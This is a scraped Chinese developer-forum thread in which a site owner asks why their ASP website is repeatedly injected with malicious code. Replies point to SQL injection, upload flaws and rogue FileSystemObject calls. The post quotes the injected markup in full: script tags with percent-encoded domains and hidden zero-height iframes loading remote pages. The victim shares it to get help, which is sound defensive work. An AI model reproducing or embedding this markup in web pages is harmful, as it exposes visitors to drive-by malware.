28,392
社区成员
发帖
与我相关
我的任务
分享请问网站被挂马的原因?
我的一个asp网站被挂马了,请问这是我的asp程序的漏洞引起的,还是服务器的漏洞引起的,或者是服务器本身有病毒引起的?
我觉得是服务器的总是,但是虚拟机提供商说是我的程序漏洞引起的。我也不知道哪儿有什么漏洞。
网站除管理员外,其它人员没有上传功能。整个网站基本上就是以阅读内容为主,只有一个留言系统是对外开放的。
每次清除了,过不多久,又被挂上了。挂的马很多,如下:
<script src=http://%7A%73%68%61%63%6B%2E%63%6E></script><script src=http://%7A%73%68%61%63%6B%2E%63%6E></script><script src=http://qqhaomm.cn></script><script src=http://yyhaomm.cn></script><script src=http://%61%76%65%31%2E%63%6E></script><iframe src=http://www.pdh001.cn/b3.htm width=50 height=0 border=0></iframe><script src=http://%61%76%65%32%2E%63%6E></script><iframe src=http://www.wyf005.cn/b3.htm width=50 height=0 border=0></iframe><script src=http://%61%76%65%32%2E%63%6E></script>
<script src=http://%7a%73%68%61%63%6b></script><script src=http://%7a%73%68%61%63%6b></script><script src=http://qqhaomm></script><script language="javascript" src="http://conn.ch.ma/click.js?id=15&evx=52591"></script><script src=http://yyhaomm></script><script src=http://%61%76%65%31></script><script src=http://%61%76%65%32></script><script src=http://%61%76%65%32%2E%63%6E></script>
<script language="javascript" src="http://conn.ch.ma/click.js?id=15&evx=52591"></script>
我觉得是服务器的总是,但是虚拟机提供商说是我的程序漏洞引起的。我也不知道哪儿有什么漏洞。
网站除管理员外,其它人员没有上传功能。整个网站基本上就是以阅读内容为主,只有一个留言系统是对外开放的。
每次清除了,过不多久,又被挂上了。挂的马很多,如下:
<script src=http://%7A%73%68%61%63%6B%2E%63%6E></script><script src=http://%7A%73%68%61%63%6B%2E%63%6E></script><script src=http://qqhaomm.cn></script><script src=http://yyhaomm.cn></script><script src=http://%61%76%65%31%2E%63%6E></script><iframe src=http://www.pdh001.cn/b3.htm width=50 height=0 border=0></iframe><script src=http://%61%76%65%32%2E%63%6E></script><iframe src=http://www.wyf005.cn/b3.htm width=50 height=0 border=0></iframe><script src=http://%61%76%65%32%2E%63%6E></script>
<script src=http://%7a%73%68%61%63%6b></script><script src=http://%7a%73%68%61%63%6b></script><script src=http://qqhaomm></script><script language="javascript" src="http://conn.ch.ma/click.js?id=15&evx=52591"></script><script src=http://yyhaomm></script><script src=http://%61%76%65%31></script><script src=http://%61%76%65%32></script><script src=http://%61%76%65%32%2E%63%6E></script>
<script language="javascript" src="http://conn.ch.ma/click.js?id=15&evx=52591"></script>
...全文
请发表友善的回复…
发表回复
heyisheng 2009-06-22
- 打赏
- 举报
这问题很严重,很明显是网站存在漏洞而被攻击了,若需要安全技术服务请联系EMAIL & MSN:yisheng@hotmail.com, 7X24 为您的网站保驾护航。
-晴天 2008-10-13
- 打赏
- 举报
查查哪个文件里有这样的话:
CreateObject("Scripting.FileSystemObject")
如果不是你写的,那就是问题程序了.
CreateObject("Scripting.FileSystemObject")
如果不是你写的,那就是问题程序了.
-晴天 2008-10-13
- 打赏
- 举报
最简单的程序查找漏洞的方法:
检查服务器上程序文件的生成日期,如与你上传时的日期不符,多半是被人改了.到这些文件中找找FSO,一般都是通过不设置权限的FSO,上传另一个文件来达到控制你网站的目的.
检查服务器上程序文件的生成日期,如与你上传时的日期不符,多半是被人改了.到这些文件中找找FSO,一般都是通过不设置权限的FSO,上传另一个文件来达到控制你网站的目的.
xdspower 2008-10-13
- 打赏
- 举报
如果有较好能力,把网站迁移到Linux环境下,可能稍微好些。
TurtleRock 2008-10-13
- 打赏
- 举报
这真是个麻烦事啊,程序不好检查漏洞啊,一大堆。
各位有没有什么这方面的经验?
各位有没有什么这方面的经验?
Anlige 2008-10-13
- 打赏
- 举报
另外可能是服务器被攻击~
lovewangshuqiong 2008-10-13
- 打赏
- 举报
存在SQL注入漏洞
yoory 2008-10-13
- 打赏
- 举报
难道这也是一种幸运.
TurtleRock 2008-10-13
- 打赏
- 举报
哦,可是我的上传程序只有管理员才能使用啊。
qxg1123 2008-10-13
- 打赏
- 举报
服务器设置的可能,最常见的为上传程序有漏洞
Atai-Lu 2008-10-13
- 打赏
- 举报
一般是上传漏洞
可能是你哪个地方对权限的检测不够好,也可能真是服务商的问题
可能是你哪个地方对权限的检测不够好,也可能真是服务商的问题
